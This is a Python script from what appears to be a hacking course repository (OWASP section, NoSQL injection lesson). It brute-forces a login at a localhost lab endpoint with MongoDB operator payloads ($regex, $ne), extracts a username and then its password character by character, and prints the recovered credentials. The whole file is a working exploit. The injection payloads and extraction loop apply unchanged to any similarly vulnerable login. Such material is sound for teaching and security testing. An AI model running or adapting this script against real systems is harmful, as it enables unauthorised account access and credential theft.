infosec/Introduccion-hacking-hack4u/tema_6_owasp/13_nosqli/nosqli.py
2024-02-14 02:30:34 +01:00

118 lines
2.5 KiB
Python

#!/usr/bin/env python
"""
Script para hacer un ataque de fuerza bruta a un login con NoSQL Injection.
Encuentra el primer usuario y su contraseña.
"""
import os
import requests
import signal
import string
import sys
import time
from pwn import *
from termcolor import colored
def def_handler(sig, frame):
print(colored("\n\n[!] Saliendo...\n", "red"))
sys.exit(1)
# Ctrl+C
signal.signal(signal.SIGINT, def_handler)
# Variables globales
login_url = "http://localhost:4000/user/login"
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
users_passwords = {}
def makeNoSQLIuser():
os.system("clear")
user = ""
p1 = log.progress(colored("Bruteando user", "magenta"))
p1.status(colored("Iniciando ataque", "cyan"))
time.sleep(2)
p2 = log.progress(colored("User", "magenta"))
for position in range(0, 30):
for char in characters:
post_data = '{"username":{"$regex":"^%s%s"},"password":{"$ne": "admin"}}' % (
user, char
)
p1.status(colored(post_data, "blue"))
headers = {
"Content-Type": "application/json"
}
r = requests.post(login_url, data=post_data, headers=headers)
if "Logged in as user" in r.text:
user += char
p2.status(colored(user, "green"))
break
return user
def makeNoSQLIpass(user):
os.system("clear")
password = ""
p1 = log.progress(colored(f"Bruteando password de {user}", "magenta"))
p1.status(colored("Iniciando ataque", "cyan"))
time.sleep(2)
p2 = log.progress(colored("Password", "magenta"))
for position in range(0, 50):
for char in characters:
user_json = '{"username":"%s","password"' % user
post_data = user_json + ':{"$regex":"^%s%s"}}' % (
password, char
)
p1.status(colored(post_data, "blue"))
headers = {
"Content-Type": "application/json"
}
r = requests.post(login_url, data=post_data, headers=headers)
if "Logged in as user" in r.text:
password += char
p2.status(colored(password, "green"))
break
return password
if __name__ == '__main__':
user = makeNoSQLIuser()
password = makeNoSQLIpass(user)
users_passwords[user] = password
os.system("clear")
time.sleep(1)
for u, p in users_passwords.items():
print(colored(f"\n[+] {u}:{p}\n", "green"))